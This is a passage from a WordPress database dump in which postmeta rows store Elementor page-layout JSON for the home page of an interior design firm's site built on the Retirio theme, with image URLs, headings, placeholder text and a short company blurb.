osition_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(3431,4797,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(3432,4797,'_elementor_pro_version','3.8.1'),(3433,4798,'_wp_page_template','elementor_header_footer'),(3434,4798,'_elementor_edit_mode','builder'),(3435,4798,'_elementor_template_type','wp-page'),(3436,4798,'_elementor_version','3.8.1');
INSERT INTO `wpev_postmeta` VALUES (3437,4798,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"backgr